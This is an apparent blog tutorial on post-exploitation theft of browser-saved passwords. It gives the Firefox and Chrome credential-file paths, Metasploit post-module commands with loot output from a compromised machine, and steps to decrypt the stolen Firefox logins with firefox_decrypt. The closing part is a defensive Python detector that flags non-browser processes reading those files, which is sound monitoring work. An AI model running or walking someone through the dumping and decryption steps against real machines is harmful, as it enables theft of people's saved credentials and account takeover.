How To Retrieve & Decrypt Stored Passwords in Firefox & Chrome Remotely

Retrieving stored passwords from web browsers such as Mozilla Firefox and Google Chrome is part of the post-exploitation methodology: an attacker with backdoor access to a compromised computer can easily dump and decrypt the credentials those browsers store.

Dumping Stored Mozilla Firefox Passwords

Mozilla Firefox's built-in password manager stores encrypted credentials in “logins.json”. The credentials in logins.json are encrypted with a key that is stored in the “key4.db” file. Both files live in the Firefox profile directory on Windows:

%LocalAppData%\Mozilla\Firefox\Profiles\randomString.Default\logins.json

There’s a Metasploit (MSF) post module we’ll use to dump stored Firefox passwords from a compromised computer.

Module: firefox_creds

run post/multi/gather/firefox_creds


[+] Downloaded cert9.db: /root/.msf4/loot/20200927050238_default_10.10.78.147_ff.ljfn812a.cert_254315.bin
[+] Downloaded cookies.sqlite: /root/.msf4/loot/20200927050241_default_10.10.78.147_ff.ljfn812a.cook_800633.bin
[+] Downloaded key4.db: /root/.msf4/loot/20200927050253_default_10.10.78.147_ff.ljfn812a.key4_784345.bin
[+] Downloaded logins.json: /root/.msf4/loot/20200927050257_default_10.10.78.147_ff.ljfn812a.logi_176246.bin

The module downloaded 4 files for us, but you can also download them manually.

The module saves them with a .bin extension; rename them back to their original names (cert9.db, cookies.sqlite, key4.db, logins.json).

As noted above, the credentials are encrypted, so the next step is to decrypt them.

Decrypting Stored Passwords in Mozilla Firefox

Download firefox_decrypt to your local machine and run the script.

git clone https://github.com/unode/firefox_decrypt.git

There’s a manual in the GitHub repo you can follow. Let’s decrypt our credentials.

python firefox_decrypt.py /root/.msf4/loot

And there you go!

Dumping Stored Google Chrome Passwords

Google Chrome uses a Windows function called CryptProtectData to encrypt the passwords it stores on the computer with randomly generated keys. The database is located in the directory below.

%LocalAppData%\Google\Chrome\User Data\Default\Login Data

There’s a Metasploit module available to dump stored credentials from the Chrome browser.

Module: enum_chrome

run post/windows/gather/enum_chrome

Decrypting Stored Passwords in Google Chrome

When the Metasploit module retrieves credentials, it writes .txt files whose “Decrypted Data” column shows the decrypted passwords found in the Chrome browser.
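Both browsers keep their credential stores as ordinary files under the user's profile, so the defender's counterpart to the two modules above is to audit which process opens those files: only firefox.exe should touch logins.json, key4.db, cert9.db and cookies.sqlite, and only chrome.exe should touch Login Data. The following Python is an added example, not part of this post or of Metasploit; it runs that check over constructed file-access events, and the Image/TargetFilename field names, the process allow-list and the sample paths are assumptions.

```python
import re

# Credential-store files named on this page (Firefox profile files, Chrome's Login Data).
CRED_STORE_PATTERNS = [
    (re.compile(r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\"
                r"(logins\.json|key4\.db|cert9\.db|cookies\.sqlite)$", re.I), "firefox"),
    (re.compile(r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$", re.I), "chrome"),
]
# Only the browser itself is expected to open its own credential store (assumed allow-list).
EXPECTED_PROCESS = {"firefox": {"firefox.exe"}, "chrome": {"chrome.exe"}}

def classify_path(path):
    # Return "firefox", "chrome" or None depending on which store the path belongs to.
    for pattern, browser in CRED_STORE_PATTERNS:
        if pattern.search(path):
            return browser
    return None

def detect_credential_store_access(events):
    # Each event needs Image (full path of the accessing process) and
    # TargetFilename (file opened); a non-browser process on a store is flagged.
    findings = []
    for ev in events:
        browser = classify_path(ev.get("TargetFilename", ""))
        if browser is None:
            continue
        image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if image not in EXPECTED_PROCESS[browser]:
            findings.append({"browser": browser, "process": image,
                             "file": ev["TargetFilename"], "time": ev.get("UtcTime")})
    return findings

# Constructed sample events (not real telemetry). The Image/TargetFilename field
# names are an assumption; map your audit source's fields (e.g. object-access logs) onto them.
FF = r"C:\Users\alice\AppData\Local\Mozilla\Firefox\Profiles\ljfn812a.default"
CR = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data\Default"
SAMPLE_EVENTS = [
    {"UtcTime": "2020-09-27 05:02:10", "TargetFilename": FF + r"\logins.json",
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"UtcTime": "2020-09-27 05:02:38", "TargetFilename": FF + r"\key4.db",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"UtcTime": "2020-09-27 05:02:57", "TargetFilename": CR + r"\Login Data",
     "Image": r"C:\Windows\System32\cmd.exe"},
    {"UtcTime": "2020-09-27 05:03:01", "TargetFilename": CR + r"\Login Data",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
    {"UtcTime": "2020-09-27 05:03:05", "TargetFilename": r"C:\Users\alice\Documents\notes.txt",
     "Image": r"C:\Windows\System32\notepad.exe"},
]
```

Running detect_credential_store_access(SAMPLE_EVENTS) flags the powershell.exe read of key4.db and the cmd.exe read of Login Data while the browsers' own accesses pass.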
